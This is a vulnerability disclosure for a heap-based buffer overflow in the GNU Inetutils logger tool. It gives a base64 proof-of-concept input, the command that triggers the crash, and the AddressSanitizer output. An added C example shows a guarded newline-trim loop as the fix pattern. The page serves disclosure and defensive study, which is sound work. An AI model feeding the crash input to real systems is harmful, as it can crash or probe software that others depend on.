CVE-2021-45781: Heap-based Buffer Overflow in logger

GNU Inetutils 2.2.16-cf091 was discovered to contain a heap-based buffer overflow via the component logger at inetutils/src/logger.c.


# Heap-based Buffer Overflow in logger

## Description

Heap-based Buffer Overflow in logger at inetutils/src/logger.c:329

**version**

```
./logger --version
logger (GNU inetutils) 2.2.16-cf091
Copyright © 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later https://gnu.org/licenses/gpl.html.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by Sergey Poznyakoff.
```

**System information**

Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**poc**

```
base64 poc
ZYdn/3JycmMjY2NPcnJjI2NjTwCAAAoAAIAAAABECm5vjAB9UQpubm9ybREqGzZNaYSEKhs2TWmE
hHY=
```

**command**

```
./logger -s < ./poc
```

**Result**

```
./logger -s < ./poc
e�g�rrrc#ccOrrc#ccO
=================================================================
==4156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000003f at pc 0x0000004c679b bp 0x7ffe5f3b7250 sp 0x7ffe5f3b7248
READ of size 1 at 0x60c00000003f thread T0
#0 0x4c679a in send_to_syslog /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11
#1 0x4c5cf2 in main /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:511:2
#2 0x7fa5804200b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/…/csu/libc-start.c:308:16
#3 0x41c46d in _start (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x41c46d)

0x60c00000003f is located 1 bytes to the left of 120-byte region [0x60c000000040,0x60c0000000b8)
allocated by thread T0 here:
#0 0x494bad in malloc (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x494bad)
#1 0x7fa58047f6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27
#2 0x8000000000000005 (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11 in send_to_syslog
Shadow bytes around the buggy address:
0x0c187fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff8000: fa fa fa fa fa fa fa[fa]00 00 00 00 00 00 00 00
0x0c187fff8010: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==4156==ABORTING
```
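The report above records a `READ of size 1` at an address one byte to the left of a 120-byte region that `getdelim` allocated, i.e. `buf[-1]` on a line buffer. One pattern that produces exactly that report in a line-oriented tool is a trailing-newline trim loop that indexes `buf[len - 1]` without first checking `len > 0`, typically after deriving `len` from `strlen()` on a line whose first byte is NUL (so `strlen()` says 0 while `getline()` returned several bytes). The following is an added example written for this page, not inetutils code and not a claim about the exact statement at logger.c:329. It shows the guarded form of that loop and walks a constructed in-memory input (via `fmemopen`, assumed available as on glibc) to show where the `getline()` byte count and `strlen()` disagree; the `sample_input` bytes are constructed here and are unrelated to the page's poc.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

/* Prototypes in case the compiler runs in a strict -std mode in which
   <stdio.h> hides these POSIX.1-2008 functions. */
extern ssize_t getline (char **, size_t *, FILE *);
extern FILE *fmemopen (void *, size_t, const char *);

/* Strip trailing '\n' / '\r' bytes in place and return the new length.
   LEN is the byte count getline() returned, not strlen(): the two differ
   as soon as the line contains a NUL byte.  The `len > 0` guard is what
   keeps the loop from reading buf[-1], the byte just left of the heap
   region, when the line is empty. */
static size_t
trim_trailing_newline (char *buf, size_t len)
{
  while (len > 0 && (buf[len - 1] == '\n' || buf[len - 1] == '\r'))
    buf[--len] = '\0';
  return len;
}

/* Trim a copy of the first LEN bytes of S and return the resulting length
   (0 if S does not fit the scratch buffer).  Lets callers try the trim on
   literals, including ones that start with a NUL byte. */
static size_t
trimmed_length (const char *s, size_t len)
{
  char tmp[64];
  if (len >= sizeof tmp)
    return 0;
  memcpy (tmp, s, len);
  tmp[len] = '\0';
  return trim_trailing_newline (tmp, len);
}

struct line_stats
{
  int lines;            /* lines getline() handed back */
  int nul_lines;        /* lines where strlen() < byte count (embedded NUL) */
  int empty_after_trim; /* lines strlen() reports as "" after trimming */
};

/* Walk DATA (N bytes) line by line, the way a stdin-driven tool does,
   and record how often strlen() would have misled a length calculation.
   Every line is trimmed with the guarded loop, so an empty line or a
   NUL-leading line never indexes below the buffer. */
static struct line_stats
scan_lines (const char *data, size_t n)
{
  struct line_stats st = { 0, 0, 0 };
  FILE *fp = fmemopen ((void *) data, n, "r");
  char *buf = NULL;
  size_t cap = 0;
  ssize_t got;

  if (fp == NULL)
    return st;
  while ((got = getline (&buf, &cap, fp)) > 0)
    {
      size_t len = trim_trailing_newline (buf, (size_t) got);
      st.lines++;
      if (strlen (buf) < len)
        st.nul_lines++;
      if (strlen (buf) == 0)
        st.empty_after_trim++;
    }
  free (buf);
  fclose (fp);
  return st;
}

/* Constructed sample input (not the page's poc): four lines.  The second
   starts with a NUL byte, so getline() returns 4 bytes while strlen()
   reports 0; the third is an empty line. */
static const char sample_input[] = "hello\n\0\x80\0\n\nworld\n";
static const size_t sample_len = sizeof sample_input - 1;

int
main (void)
{
  struct line_stats st = scan_lines (sample_input, sample_len);
  printf ("lines=%d embedded-NUL=%d empty-after-trim=%d\n",
          st.lines, st.nul_lines, st.empty_after_trim);
  return 0;
}
```

The design point is that the length passed to the trim loop is the value `getline()` returned, and the loop checks `len > 0` before every `buf[len - 1]`; building with `-fsanitize=address` and feeding the program lines that start with NUL or are empty then produces no report, whereas an unguarded `buf[len - 1]` on the same input is the one-byte read left of the `getdelim` region the page shows.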
